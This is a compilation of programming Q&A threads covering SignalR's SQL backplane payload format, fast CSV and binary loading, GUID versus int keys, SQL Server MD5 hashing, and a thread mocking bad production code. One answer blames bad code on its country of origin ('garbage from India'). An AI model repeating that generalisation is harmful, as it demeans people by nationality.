Is it possible to add SignalR messages directly to the SQL Backplane?

I'd like to know if I can add SignalR messages directly to the SignalR SQL Backplane (from SQL) so I don't have to use a SignalR client to do so.
My situation is that I have an activated stored procedure for a SQL Service Broker queue, and when it fires, I'd like to post a message to SignalR clients. Currently, I have to receive the message from SQL Service Broker in a separate process and then immediately re-send the message with a SignalR hub.
I'd like my activated stored procedure to basically move the message directly onto the SignalR SQL Backplane.

Yes and no. I set up a small experiment on my localhost to determine whether it's possible - and it is, if the message is formatted properly.
Now, a word on the [SignalR] schema. It generates three tables:
[SignalR].[Messages_0]
--this holds a list of all messages with the columns of
--[PayloadId], [Payload], and [InsertedOn]
[SignalR].[Messages_0_Id]
--this holds one record of one field - the last Id value in the [Messages_0] table
[SignalR].[Schema]
--No idea what this is for; it's a one-column (SchemaVersion), one-record (value of 1) table
Right, so, I duplicated the last record, except I incremented the PayloadId (for the new record and in [Messages_0_Id]) and put in GETDATE() as the value for InsertedOn. Immediately after adding the record, a new message came into the connected client. Note that PayloadId is not an identity column, so you must manually increment it, and you must copy that incremented value into the only record in [Messages_0_Id], otherwise your SignalR clients will be unable to connect due to SignalR SQL errors.
Now, the trick is populating the [Payload] column properly. A quick look at the table shows that it's probably binary serialized. I'm no expert at SQL, but I'm pretty sure doing a binary serialization is up there in difficulty. If I'm right, this is the source code for the binary serialization, located inside Microsoft.AspNet.SignalR.Messaging.ScaleoutMessage:
public byte[] ToBytes()
{
    using (MemoryStream memoryStream = new MemoryStream())
    {
        BinaryWriter binaryWriter = new BinaryWriter((Stream) memoryStream);
        binaryWriter.Write(this.Messages.Count);
        for (int index = 0; index < this.Messages.Count; ++index)
            this.Messages[index].WriteTo((Stream) memoryStream);
        binaryWriter.Write(this.ServerCreationTime.Ticks);
        return memoryStream.ToArray();
    }
}
With WriteTo:
public void WriteTo(Stream stream)
{
    BinaryWriter binaryWriter = new BinaryWriter(stream);
    string source = this.Source;
    binaryWriter.Write(source);
    string key = this.Key;
    binaryWriter.Write(key);
    int count1 = this.Value.Count;
    binaryWriter.Write(count1);
    ArraySegment<byte> arraySegment = this.Value;
    byte[] array = arraySegment.Array;
    arraySegment = this.Value;
    int offset = arraySegment.Offset;
    arraySegment = this.Value;
    int count2 = arraySegment.Count;
    binaryWriter.Write(array, offset, count2);
    string str1 = this.CommandId ?? string.Empty;
    binaryWriter.Write(str1);
    int num1 = this.WaitForAck ? 1 : 0;
    binaryWriter.Write(num1 != 0);
    int num2 = this.IsAck ? 1 : 0;
    binaryWriter.Write(num2 != 0);
    string str2 = this.Filter ?? string.Empty;
    binaryWriter.Write(str2);
}
So, re-implementing that in a stored procedure with pure SQL will be near impossible. If you need to do it on the SQL Server, I suggest using SQL CLR functions. One thing to mention, though - It's easy enough to use a class library, but if you want to reduce hassle over the long term, I'd suggest creating a SQL Server project in Visual Studio. This will allow you to automagically deploy CLR functions with much more ease than manually re-copying the latest class library to the SQL Server. This page talks more about how to do that.
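If you go the CLR route, a rough sketch of such a function might look like the code below. It simply mirrors the ToBytes()/WriteTo() layout shown above for a single message; the function and parameter names are mine, not part of SignalR, and I haven't verified it end-to-end against connected clients, so treat it as a starting point rather than a drop-in solution:
using System;
using System.Data.SqlTypes;
using System.IO;
using Microsoft.SqlServer.Server;

public partial class UserDefinedFunctions
{
    [SqlFunction]
    public static SqlBytes SerializeSignalRPayload(SqlString source, SqlString key, SqlBytes value)
    {
        using (MemoryStream ms = new MemoryStream())
        {
            BinaryWriter writer = new BinaryWriter(ms);
            writer.Write(1);                               // Messages.Count - a single message
            writer.Write(source.Value);                    // Source
            writer.Write(key.Value);                       // Key
            writer.Write((int)value.Length);               // Value length, written as int32
            writer.Write(value.Buffer, 0, (int)value.Length);
            writer.Write(string.Empty);                    // CommandId
            writer.Write(false);                           // WaitForAck
            writer.Write(false);                           // IsAck
            writer.Write(string.Empty);                    // Filter
            writer.Write(DateTime.UtcNow.Ticks);           // ServerCreationTime.Ticks
            return new SqlBytes(ms.ToArray());
        }
    }
}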

I was inspired by this post and wrote up a version in an SQL stored proc. Works really slick, and wasn't hard.
I hadn't done much work with varbinary before - but SQL Server makes it pretty easy to work with, and you can just add the sections together. The format given by James Haug above is accurate. Most of the strings are just "length as byte then the string content" (with the string content just being convert(varbinary,string)). The exception is the payload string, which instead is "length as int32 then string content". Numbers are written out "least significant byte first". I'm not sure whether you can do a conversion like this natively - I found it easy enough to write this myself as a recursive function (something like numToBinary(val,bytesRemaining)... returns varbinary).
If you take this route, I'd still write a parser first (in .NET or another non-SQL language) and test it on some packets generated by SignalR itself. That gives you a better place to work out the kinks in your SQL - and learn the right formatting of the payload package and what not.
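For what it's worth, a minimal .NET parser for that payload format might look something like the sketch below. It just follows the ToBytes()/WriteTo() layout from the other answer (BinaryReader.ReadString handles the length-prefixed strings, and the payload itself is an int32 length plus raw bytes); the method name is purely illustrative:
using System;
using System.IO;
using System.Text;

static void DumpPayload(byte[] payload)
{
    using (BinaryReader reader = new BinaryReader(new MemoryStream(payload)))
    {
        int messageCount = reader.ReadInt32();
        for (int i = 0; i < messageCount; i++)
        {
            string source = reader.ReadString();       // length-prefixed string
            string key = reader.ReadString();
            int valueLength = reader.ReadInt32();      // payload length as int32
            byte[] value = reader.ReadBytes(valueLength);
            string commandId = reader.ReadString();
            bool waitForAck = reader.ReadBoolean();
            bool isAck = reader.ReadBoolean();
            string filter = reader.ReadString();
            Console.WriteLine(source + " " + key + ": " + Encoding.UTF8.GetString(value));
        }
        long serverCreationTicks = reader.ReadInt64();
        Console.WriteLine("ServerCreationTime: " + new DateTime(serverCreationTicks));
    }
}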

Related

Reading a CSV file with 50M lines, how to improve performance

I have a data file in CSV (Comma-Separated-Value) format that has about 50 million lines in it.
Each line is read into a string, parsed, and then used to fill in the fields of an object of type FOO. The object then gets added to a List(of FOO) that ultimately has 50 million items.
That all works, and fits in memory (at least on an x64 machine), but it's SLOW. It takes about 5 minutes every time to load and parse the file into the list. I would like to make it faster. How can I make it faster?
The important parts of the code are shown below.
Public Sub LoadCsvFile(ByVal FilePath As String)
    Dim s As IO.StreamReader = My.Computer.FileSystem.OpenTextFileReader(FilePath)
    'Find header line
    Dim L As String
    While Not s.EndOfStream
        L = s.ReadLine()
        If L = "" Then Continue While 'discard blank line
        Exit While
    End While
    'Parse data lines
    While Not s.EndOfStream
        L = s.ReadLine()
        If L = "" Then Continue While 'discard blank line
        Dim T As FOO = FOO.FromCSV(L)
        Add(T)
    End While
    s.Close()
End Sub
Public Class FOO
    Public time As Date
    Public ID As UInt64
    Public A As Double
    Public B As Double
    Public C As Double

    Public Shared Function FromCSV(ByVal X As String) As FOO
        Dim T As New FOO
        Dim tokens As String() = X.Split(",")
        If Not DateTime.TryParse(tokens(0), T.time) Then
            Throw New Exception("Could not convert CSV to FOO: Invalid ISO 8601 timestamp")
        End If
        If Not UInt64.TryParse(tokens(1), T.ID) Then
            Throw New Exception("Could not convert CSV to FOO: Invalid ID")
        End If
        If Not Double.TryParse(tokens(2), T.A) Then
            Throw New Exception("Could not convert CSV to FOO: Invalid Format for A")
        End If
        If Not Double.TryParse(tokens(3), T.B) Then
            Throw New Exception("Could not convert CSV to FOO: Invalid Format for B")
        End If
        If Not Double.TryParse(tokens(4), T.C) Then
            Throw New Exception("Could not convert CSV to FOO: Invalid Format for C")
        End If
        Return T
    End Function
End Class
I did some benchmarking and here are the results.
The complete algorithm above took 314 seconds to load the whole file and put the objects into the list.
With the body of FromCSV() reduced to just returning a new object of type FOO with default field values, the whole process took 84 seconds. Therefore it appears that processing the line of text into the object fields is taking 230 seconds (73% of the total time).
Doing everything but parsing the ISO 8601 date string takes 175 seconds. Therefore it appears that processing the date string takes 139 seconds, which is 60% of the text processing time, just for that one field.
Just reading the lines in the file without any processing or object creating takes 41 seconds.
Using StreamReader.ReadBlock to read the whole file in chunks of about 1KB takes 24s, but it's a minor improvement in the grand scheme of things and probably not worth the added complexity. In order to use TryParse I would now need to manually create the temporary strings rather than using String.Split().
At this point the only path I see is to just display status to the user every few seconds so they don't wonder if the program is frozen or something.
UPDATE
I created two new functions. One can save the dataset from memory into a binary file using System.IO.BinaryWriter. The other function can load that binary file back into memory using System.IO.BinaryReader. The binary versions were considerably faster than CSV versions, and the binary files take up much less space.
Here are the benchmark results (same dataset for all tests):
LOAD CSV: 340s
SAVE CSV: 312s
SAVE BIN: 29s
LOAD BIN: 41s
CSV FILE SIZE: 3.86GB
BIN FILE SIZE: 1.63GB
I have a lot of experience with CSV, and the bad news is that you aren't going to be able to make this a whole lot faster. CSV libraries aren't going to be of much assistance here. The difficult problem with CSV, that libraries attempt to handle, is dealing with fields that have embedded commas, or newlines, which require quoting and escaping. Your dataset doesn't have this issue, since none of the columns are strings.
As you have discovered, the bulk of the time is spent in the parse methods. Andrew Morton had a good suggestion: using TryParseExact for DateTime values can be quite a bit faster than TryParse. My own CSV library, Sylvan.Data.Csv (which is the fastest available for .NET), uses an optimization where it parses primitive values directly out of the stream read buffer without converting to string first (only when running on .NET Core), which can also speed things up a bit. However, I wouldn't expect it to be possible to cut the processing time in half while sticking with CSV.
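To illustrate the TryParseExact point, a minimal sketch (my code, assuming the same ISO 8601 format used in the example below); supplying an exact format string avoids the format-guessing work that TryParse does for every row:
using System;
using System.Globalization;

static bool TryParseTimestamp(string text, out DateTime value)
{
    // Exact, culture-invariant parse of e.g. "2021-03-04T13:45:10"
    return DateTime.TryParseExact(text, "yyyy-MM-ddTHH:mm:ss",
        CultureInfo.InvariantCulture, DateTimeStyles.None, out value);
}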
Here is an example of using my library, Sylvan.Data.Csv, to process the CSV in C#.
static List<Foo> Read(string file)
{
    // estimate of the average row length based on Andrew Morton's 4GB/50m
    const int AverageRowLength = 80;
    var textReader = File.OpenText(file);
    // specifying the DateFormat will cause TryParseExact to be used.
    var csvOpts = new CsvDataReaderOptions { DateFormat = "yyyy-MM-ddTHH:mm:ss" };
    var csvReader = CsvDataReader.Create(textReader, csvOpts);
    // estimate number of rows to avoid growing the list.
    var estimatedRows = (int)(textReader.BaseStream.Length / AverageRowLength);
    var data = new List<Foo>(estimatedRows);
    while (csvReader.Read())
    {
        if (csvReader.RowFieldCount < 5) continue;
        var item = new Foo()
        {
            time = csvReader.GetDateTime(0),
            ID = csvReader.GetInt64(1),
            A = csvReader.GetDouble(2),
            B = csvReader.GetDouble(3),
            C = csvReader.GetDouble(4)
        };
        data.Add(item);
    }
    return data;
}
I'd expect this to be somewhat faster than your current implementation, so long as you are running on .NET Core. Running on .NET Framework the difference, if any, wouldn't be significant. However, I don't expect this to be acceptably fast for your users; it will still likely take tens of seconds, or minutes, to read the whole file.
Given that, my advice would be to abandon CSV altogether, which means you can abandon parsing, which is what is slowing things down. Instead, read and write the data in binary form. Your data records have a nice property, in that they are fixed width: each record contains 5 fields that are 8 bytes (64 bits) wide, so each record requires exactly 40 bytes in binary form. 50m x 40 = 2GB. So, assuming Andrew Morton's estimate of 4GB for the CSV is correct, moving to binary will halve the storage needs. Immediately, that means there is half as much disk IO needed to read the same data. But beyond that, you won't need to parse anything; the binary representation of the value will essentially be copied directly to memory.
Here are some examples of how to do this in C# (don't know VB very well, sorry).
static List<Foo> Read(string file)
{
    var stream = File.OpenRead(file);
    // the exact number of records can be determined by looking at the length of the file.
    var recordCount = stream.Length / 40;
    var data = new List<Foo>((int)recordCount);
    var br = new BinaryReader(stream);
    for (int i = 0; i < recordCount; i++)
    {
        var ticks = br.ReadInt64();
        var id = br.ReadInt64();
        var a = br.ReadDouble();
        var b = br.ReadDouble();
        var c = br.ReadDouble();
        var f = new Foo()
        {
            time = new DateTime(ticks),
            ID = id,
            A = a,
            B = b,
            C = c,
        };
        data.Add(f);
    }
    return data;
}
static void Write(List<Foo> data, string file)
{
    var stream = File.Create(file);
    var bw = new BinaryWriter(stream);
    foreach (var item in data)
    {
        bw.Write(item.time.Ticks);
        bw.Write(item.ID);
        bw.Write(item.A);
        bw.Write(item.B);
        bw.Write(item.C);
    }
}
This should almost certainly be an order of magnitude faster than a CSV-based solution. The question then becomes: is there some reason that you must use CSV? If the source of the data is out of your control and you must use CSV, I would then ask: will the data file change every time, or will it only be appended to with new data? If it is appended to, I would investigate a solution where, each time the app starts, you convert only the newly appended CSV data and add it to a binary file that you then load everything from. Then you only have to pay the cost of processing the new CSV data each time, and will load everything quickly from the binary form.
This could be made even faster by creating a fixed layout struct (Foo), allocating an array of them, and using span-based trickery to read the array data directly from the FileStream. This can be done because all of your data elements are "blittable". This would be the absolute fastest way to load this data into your program. Start with the BinaryReader/Writer and if you find that still isn't fast enough, then investigate this.
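As a rough sketch of that span-based idea (my names, assuming .NET Core or later, with the DateTime held as ticks so the struct stays blittable):
using System;
using System.IO;
using System.Runtime.InteropServices;

[StructLayout(LayoutKind.Sequential, Pack = 1)]
struct FooRecord
{
    public long Ticks;   // DateTime.Ticks
    public long ID;
    public double A;
    public double B;
    public double C;
}

static FooRecord[] ReadAll(string file)
{
    using (var stream = File.OpenRead(file))
    {
        // 40 bytes per record, the same layout the BinaryWriter example produces.
        var records = new FooRecord[stream.Length / 40];
        // Reinterpret the struct array as raw bytes and fill it straight from the stream.
        Span<byte> bytes = MemoryMarshal.AsBytes(records.AsSpan());
        while (bytes.Length > 0)
        {
            int read = stream.Read(bytes);
            if (read == 0) throw new EndOfStreamException();
            bytes = bytes.Slice(read);
        }
        return records;
    }
}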
If you find this solution to work, I'd love to hear the results.

how common is it to use both a guid and an int as unique identifiers for a table?

I think a Guid is generally the preferred unique table row identifier from a dba perspective. But I'm working on a project where the developers and managers appear to want a way to reference things by an int value. I can understand their perspective b/c they want a simple and easy way to reference different entities.
I was thinking about using a pattern for my tables where each table would have an int Id column representing the PK column but then it would also include a Guid column as a globally unique identifier. How common is it to use this type of pattern?
In the vast majority of cases you'll want to use either an INT or BIGINT for your primary key/foreign key. For the most part you are looking to make sure the table can be joined to and that there's a way to easily select a single unique row. In theory using GUIDs all over the place gets you there too, if you were a robot and could quickly ask a colleague, "Hey can you check out ROW_ID FD229C39-2074-4B04-8A50-456402705C02" vs "Hey can you check out ROW_ID 523". But we are human. I don't think there is a really good reason to include another column that is simply a GUID in addition to your PK (which should be an INT or BIGINT).
It can also be nice to have your PK values in order; that seems to come in handy. GUIDs won't be in order. However, a case for using a GUID would be if you have to expose this value to a customer. You may not want them to know they are customer #6. Being customer #B8D44820-DF75-44C9-8527-F6AC7D1D259B isn't too great if they have to call in and identify themselves, but it might be fine for writing code against (say a web service or some kind of API). SQL is a lot of art with the science!
In addition, do you really need a globally unique id for a row? Probably not. If you are designing a system that could use up more than what an INT can handle (say, the total number of tweets of all time), then use BIGINT. If you can use up all the BIGINTs, wow. I'd be interested in hearing how, and would like to subscribe to your newsletter.
A question I ask myself when writing stuff: "If I'm wrong, how hard will it be to do it the other way?" If you really need a GUID later, add it. If you put it in now and just one person uses it, you can never take it out and it will have to be maintained... job security? Nah, don't think that way :) Don't over-engineer it.
I would not say GUID is generally preferred from a DBA perspective. It is larger (16 bytes rather than 4 for int or 8 for bigint) and the random variety introduces fragmentation and causes much more IO with large tables due to lower page life expectancy. This is especially a problem with spinning media and limited RAM.
When a GUID is actually needed, some of these issues can be avoided by using a sequential version for the GUID value rather than introducing another surrogate key. The value can be assigned by SQL Server with a NEWSEQUENTIALID() default constraint on a column, or generated in application code with the bytes ordered properly for SQL Server. Below is a Windows C# example of the latter technique.
using System;
using System.Runtime.InteropServices;

public class Example
{
    [DllImport("rpcrt4.dll", CharSet = CharSet.Auto)]
    public static extern int UuidCreateSequential(ref Guid guid);

    /// sequential guid for SQL Server
    public static Guid NewSequentialGuid()
    {
        const int S_OK = 0;
        const int RPC_S_UUID_LOCAL_ONLY = 1824;

        Guid oldGuid = Guid.Empty;
        int result = UuidCreateSequential(ref oldGuid);
        if (result != S_OK && result != RPC_S_UUID_LOCAL_ONLY)
        {
            throw new ExternalException("UuidCreateSequential call failed", result);
        }

        byte[] oldGuidBytes = oldGuid.ToByteArray();
        byte[] newGuidBytes = new byte[16];
        oldGuidBytes.CopyTo(newGuidBytes, 0);

        // swap low timestamp bytes (0-3)
        newGuidBytes[0] = oldGuidBytes[3];
        newGuidBytes[1] = oldGuidBytes[2];
        newGuidBytes[2] = oldGuidBytes[1];
        newGuidBytes[3] = oldGuidBytes[0];

        // swap middle timestamp bytes (4-5)
        newGuidBytes[4] = oldGuidBytes[5];
        newGuidBytes[5] = oldGuidBytes[4];

        // swap high timestamp bytes (6-7)
        newGuidBytes[6] = oldGuidBytes[7];
        newGuidBytes[7] = oldGuidBytes[6];

        // remaining 8 bytes are unchanged (8-15)
        return new Guid(newGuidBytes);
    }
}

Using MD5 in SQL Server 2005 to do a checksum file on a varbinary

I'm trying to do an MD5 check of a file uploaded to a varbinary field in MSSQL 2005.
I uploaded the file and using
SELECT DATALENGTH(thefile) FROM table
I get the same number of bytes that the file has.
But using MD5 Calculator (from Bullzip) I get this MD5:
20cb960d7b191d0c8bc390d135f63624
and using SQL I get this MD5:
44c29edb103a2872f519ad0c9a0fdaaa
Why are they different if the field has the same length and so, I assume, the same bytes?
My SQL Code to do that was:
DECLARE @HashThis varbinary;
DECLARE @md5text varchar(250);
SELECT @HashThis = thefile FROM CFile WHERE id=1;
SET @md5text = SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5',@HashThis)),3,32)
PRINT @md5text;
Maybe the data type conversion?
Any tip will be helpful.
Thanks a lot :)
Two options:
The VARBINARY type without a size modifier defaults to VARBINARY(1), so you are hashing only the first byte of the file; SELECT DATALENGTH(@HashThis) after the assignment will return 1.
If you use varbinary(MAX) instead, keep in mind that HASHBYTES hashes only the first 8000 bytes of its input.
If you want to hash more than 8000 bytes, write your own CLR hash function. For example, the one below is from my SQL Server project; it gives the same results as other hash functions outside of SQL Server:
using System;
using System.Data.SqlTypes;
using System.IO;

namespace ClrHelpers
{
    public partial class UserDefinedFunctions {
        [Microsoft.SqlServer.Server.SqlFunction]
        public static Guid HashMD5(SqlBytes data) {
            System.Security.Cryptography.MD5CryptoServiceProvider md5 = new System.Security.Cryptography.MD5CryptoServiceProvider();
            md5.Initialize();

            int len = 0;
            byte[] b = new byte[8192];
            Stream s = data.Stream;
            do {
                len = s.Read(b, 0, 8192);
                md5.TransformBlock(b, 0, len, b, 0);
            } while(len > 0);
            md5.TransformFinalBlock(b, 0, 0);

            Guid g = new Guid(md5.Hash);
            return g;
        }
    };
}
It may be that MD5 Calculator is computing the MD5 hash of the file content plus other properties (e.g. author, last modified date, etc.). You could try altering those properties and hashing again to see whether the result changes (comparing before and after, using only MD5 Calculator).
Another possibility is that what you are actually saving in SQL Server isn't what you think it is.
So, it's quite clear that MD5 Calculator and SQL Server are hashing different things. What, exactly? Congratz to whoever answers it :)

What is the most EVIL code you have ever seen in a production enterprise environment? [closed]

What is the most evil or dangerous code fragment you have ever seen in a production environment at a company? I've never encountered production code that I would consider to be deliberately malicious and evil, so I'm quite curious to see what others have found.
The most dangerous code I have ever seen was a stored procedure two linked servers away from our core production database server. The stored procedure accepted any NVARCHAR(8000) parameter and executed the parameter on the target production server via a double-jump sp_executeSQL command. That is to say, the sp_executeSQL command executed another sp_executeSQL command in order to jump two linked servers. Oh, and the linked server account had sysadmin rights on the target production server.
Warning: Long scary post ahead
I've written about one application I've worked on before here and here. To put it simply, my company inherited 130,000 lines of garbage from India. The application was written in C#; it was a teller app, the same kind of software tellers use behind the counter whenever you go to the bank. The app crashed 40-50 times a day, and it simply couldn't be refactored into working code. My company had to re-write the entire app over the course of 12 months.
Why is this application evil? Because the sight of the source code was enough to drive a sane man mad and a mad man sane. The twisted logic used to write this application could have only been inspired by a Lovecraftian nightmare. Unique features of this application included:
Out of 130,000 lines of code, the entire application contained 5 classes (excluding form files). All of these were public static classes. One class was called Globals.cs, which contained 1000s and 1000s and 1000s of public static variables used to hold the entire state of the application. Those five classes contained 20,000 lines of code total, with the remaining code embedded in the forms.
You have to wonder, how did the programmers manage to write such a big application without any classes? What did they use to represent their data objects? It turns out the programmers managed to re-invent half of the concepts we all learned about OOP simply by combining ArrayLists, HashTables, and DataTables. We saw a lot of this:
ArrayLists of hashtables
Hashtables with string keys and DataRow values
ArrayLists of DataTables
DataRows containing ArrayLists which contained HashTables
ArrayLists of DataRows
ArrayLists of ArrayLists
HashTables with string keys and HashTable values
ArrayLists of ArrayLists of HashTables
Every other combination of ArrayLists, HashTables, DataTables you can think of.
Keep in mind, none of the data structures above are strongly typed, so you have to cast whatever mystery object you get out of the list to the correct type. It's amazing what kind of complex, Rube Goldberg-like data structures you can create using just ArrayLists, HashTables, and DataTables.
To share an example of how to use the object model detailed above, consider Accounts: the original programmer created a separate HashTable for each conceivable property of an account: a HashTable called hstAcctExists, hstAcctNeedsOverride, hstAcctFirstName. The keys for all of those hashtables were a “|” separated string. Conceivable keys included “123456|DDA”, “24100|SVG”, “100|LNS”, etc.
Since the state of the entire application was readily accessible from global variables, the programmers found it unnecessary to pass parameters to methods. I'd say 90% of methods took 0 parameters. Of the few which did, all parameters were passed as strings for convenience, regardless of what the string represented.
Side-effect free functions did not exist. Every method modified 1 or more variables in the Globals class. Not all side-effects made sense; for example, one of the form validation methods had a mysterious side effect of calculating over and short payments on loans for whatever account was stored in Globals.lngAcctNum.
Although there were lots of forms, there was one form to rule them all: frmMain.cs, which contained a whopping 20,000 lines of code. What did frmMain do? Everything. It looked up accounts, printed receipts, dispensed cash, it did everything.
Sometimes other forms needed to call methods on frmMain. Rather than factor that code out of the form into a separate class, why not just invoke the code directly:
((frmMain)this.MDIParent).UpdateStatusBar(hstValues);
To look up accounts, the programmers did something like this:
bool blnAccountExists =
new frmAccounts().GetAccountInfo().blnAccountExists
As bad as it already is creating an invisible form to perform business logic, how do you think the form knew which account to look up? That’s easy: the form could access Globals.lngAcctNum and Globals.strAcctType. (Who doesn't love Hungarian notation?)
Code-reuse was a synonym for ctrl-c, ctrl-v. I found 200-line methods copy/pasted across 20 forms.
The application had a bizarre threading model, something I like to call the thread-and-timer model: each form that spawned a thread had a timer on it. Each thread that was spawned kicked off a timer which had a 200 ms delay; once the timer started, it would check to see if the thread had set some magic boolean, then it would abort the thread. The resulting ThreadAbortException was swallowed.
You'd think you'd only see this pattern once, but I found it in at least 10 different places.
Speaking of threads, the keyword "lock" never appeared in the application. Threads manipulated global state freely without taking a lock.
Every method in the application contained a try/catch block. Every exception was logged and swallowed.
Who needs to switch on enums when switching on strings is just as easy!
Some genius figured out that you can hook multiple form controls up to the same event handler. How did the programmer handle this?
private void OperationButton_Click(object sender, EventArgs e)
{
Button btn = (Button)sender;
if (blnModeIsAddMc)
{
AddMcOperationKeyPress(btn);
}
else
{
string strToBeAppendedLater = string.Empty;
if (btn.Name != "btnBS")
{
UpdateText();
}
if (txtEdit.Text.Trim() != "Error")
{
SaveFormState();
}
switch (btn.Name)
{
case "btnC":
ResetValues();
break;
case "btnCE":
txtEdit.Text = "0";
break;
case "btnBS":
if (!blnStartedNew)
{
string EditText = txtEdit.Text.Substring(0, txtEdit.Text.Length - 1);
DisplayValue((EditText == string.Empty) ? "0" : EditText);
}
break;
case "btnPercent":
blnAfterOp = true;
if (GetValueDecimal(txtEdit.Text, out decCurrValue))
{
AddToTape(GetValueString(decCurrValue), (string)btn.Text, true, false);
decCurrValue = decResultValue * decCurrValue / intFormatFactor;
DisplayValue(GetValueString(decCurrValue));
AddToTape(GetValueString(decCurrValue), string.Empty, true, false);
strToBeAppendedLater = GetValueString(decResultValue).PadLeft(20)
+ strOpPressed.PadRight(3);
if (arrLstTapeHist.Count == 0)
{
arrLstTapeHist.Add(strToBeAppendedLater);
}
blnEqualOccurred = false;
blnStartedNew = true;
}
break;
case "btnAdd":
case "btnSubtract":
case "btnMultiply":
case "btnDivide":
blnAfterOp = true;
if (txtEdit.Text.Trim() == "Error")
{
btnC.PerformClick();
return;
}
if (blnNumPressed || blnEqualOccurred)
{
if (GetValueDecimal(txtEdit.Text, out decCurrValue))
{
if (Operation())
{
AddToTape(GetValueString(decCurrValue), (string)btn.Text, true, true);
DisplayValue(GetValueString(decResultValue));
}
else
{
AddToTape(GetValueString(decCurrValue), (string)btn.Text, true, true);
DisplayValue("Error");
}
strOpPressed = btn.Text;
blnEqualOccurred = false;
blnNumPressed = false;
}
}
else
{
strOpPressed = btn.Text;
AddToTape(GetValueString(0), (string)btn.Text, false, false);
}
if (txtEdit.Text.Trim() == "Error")
{
AddToTape("Error", string.Empty, true, true);
btnC.PerformClick();
txtEdit.Text = "Error";
}
break;
case "btnEqual":
blnAfterOp = false;
if (strOpPressed != string.Empty || strPrevOp != string.Empty)
{
if (GetValueDecimal(txtEdit.Text, out decCurrValue))
{
if (OperationEqual())
{
DisplayValue(GetValueString(decResultValue));
}
else
{
DisplayValue("Error");
}
if (!blnEqualOccurred)
{
strPrevOp = strOpPressed;
decHistValue = decCurrValue;
blnNumPressed = false;
blnEqualOccurred = true;
}
strOpPressed = string.Empty;
}
}
break;
case "btnSign":
GetValueDecimal(txtEdit.Text, out decCurrValue);
DisplayValue(GetValueString(-1 * decCurrValue));
break;
}
}
}
The same genius also discovered the glorious ternary operator. Here are some code samples:
frmTranHist.cs [line 812]:
strDrCr = chkCredits.Checked && chkDebits.Checked ? string.Empty
: chkDebits.Checked ? "D"
: chkCredits.Checked ? "C"
: "N";
frmTellTransHist.cs [line 961]:
if (strDefaultVals == strNowVals && (dsTranHist == null ? true : dsTranHist.Tables.Count == 0 ? true : dsTranHist.Tables[0].Rows.Count == 0 ? true : false))
frmMain.TellCash.cs [line 727]:
if (Validations(parPostMode == "ADD" ? true : false))
Here's a code snippet which demonstrates the typical misuse of the StringBuilder. Note how the programmer concats a string in a loop, then appends the resulting string to the StringBuilder:
private string CreateGridString()
{
    string strTemp = string.Empty;
    StringBuilder strBuild = new StringBuilder();
    foreach (DataGridViewRow dgrRow in dgvAcctHist.Rows)
    {
        strTemp = ((DataRowView)dgrRow.DataBoundItem)["Hst_chknum"].ToString().PadLeft(8, ' ');
        strTemp += " ";
        strTemp += Convert.ToDateTime(((DataRowView)dgrRow.DataBoundItem)["Hst_trandt"]).ToString("MM/dd/yyyy");
        strTemp += " ";
        strTemp += ((DataRowView)dgrRow.DataBoundItem)["Hst_DrAmount"].ToString().PadLeft(15, ' ');
        strTemp += " ";
        strTemp += ((DataRowView)dgrRow.DataBoundItem)["Hst_CrAmount"].ToString().PadLeft(15, ' ');
        strTemp += " ";
        strTemp += ((DataRowView)dgrRow.DataBoundItem)["Hst_trancd"].ToString().PadLeft(4, ' ');
        strTemp += " ";
        strTemp += GetDescriptionString(((DataRowView)dgrRow.DataBoundItem)["Hst_desc"].ToString(), 30, 62);
        strBuild.AppendLine(strTemp);
    }
    strCreateGridString = strBuild.ToString();
    return strCreateGridString; //strBuild.ToString();
}
No primary keys, indexes, or foreign key constraints existed on tables, nearly all fields were of type varchar(50), and 100% of fields were nullable. Interestingly, bit fields were not used to store boolean data; instead a char(1) field was used, and the characters 'Y' and 'N' used to represent true and false respectively.
Speaking of the database, here's a representative example of a stored procedure:
ALTER PROCEDURE [dbo].[Get_TransHist]
(
    @TellerID int = null,
    @CashDrawer int = null,
    @AcctNum bigint = null,
    @StartDate datetime = null,
    @EndDate datetime = null,
    @StartTranAmt decimal(18,2) = null,
    @EndTranAmt decimal(18,2) = null,
    @TranCode int = null,
    @TranType int = null
)
AS
declare @WhereCond Varchar(1000)
declare @strQuery Varchar(2000)
Set @WhereCond = ' '
Set @strQuery = ' '

If not @TellerID is null
    Set @WhereCond = @WhereCond + ' AND TT.TellerID = ' + Cast(@TellerID as varchar)
If not @CashDrawer is null
    Set @WhereCond = @WhereCond + ' AND TT.CDId = ' + Cast(@CashDrawer as varchar)
If not @AcctNum is null
    Set @WhereCond = @WhereCond + ' AND TT.AcctNbr = ' + Cast(@AcctNum as varchar)
If not @StartDate is null
    Set @WhereCond = @WhereCond + ' AND Convert(varchar,TT.PostDate,121) >= ''' + Convert(varchar,@StartDate,121) + ''''
If not @EndDate is null
    Set @WhereCond = @WhereCond + ' AND Convert(varchar,TT.PostDate,121) <= ''' + Convert(varchar,@EndDate,121) + ''''
If not @TranCode is null
    Set @WhereCond = @WhereCond + ' AND TT.TranCode = ' + Cast(@TranCode as varchar)
If not @EndTranAmt is null
    Set @WhereCond = @WhereCond + ' AND TT.TranAmt <= ' + Cast(@EndTranAmt as varchar)
If not @StartTranAmt is null
    Set @WhereCond = @WhereCond + ' AND TT.TranAmt >= ' + Cast(@StartTranAmt as varchar)
If not (@TranType is null or @TranType = -1)
    Set @WhereCond = @WhereCond + ' AND TT.DocType = ' + Cast(@TranType as varchar)

--Get the Teller Transaction Records according to the filters
Set @strQuery = 'SELECT
    TT.TranAmt as [Transaction Amount],
    TT.TranCode as [Transaction Code],
    RTrim(LTrim(TT.TranDesc)) as [Transaction Description],
    TT.AcctNbr as [Account Number],
    TT.TranID as [Transaction Number],
    Convert(varchar,TT.ActivityDateTime,101) as [Activity Date],
    Convert(varchar,TT.EffDate,101) as [Effective Date],
    Convert(varchar,TT.PostDate,101) as [Post Date],
    Convert(varchar,TT.ActivityDateTime,108) as [Time],
    TT.BatchID,
    TT.ItemID,
    isnull(TT.DocumentID, 0) as DocumentID,
    TT.TellerName,
    TT.CDId,
    TT.ChkNbr,
    RTrim(LTrim(DT.DocTypeDescr)) as DocTypeDescr,
    (CASE WHEN TT.TranMode = ''F'' THEN ''Offline'' ELSE ''Online'' END) TranMode,
    DispensedYN
FROM TellerTrans TT WITH (NOLOCK)
LEFT OUTER JOIN DocumentTypes DT WITH (NOLOCK) on DocType = DocumentType
WHERE IsNull(TT.DeletedYN, 0) = 0 ' + @WhereCond + ' Order By BatchId, TranID, ItemID'

Exec (@strQuery)
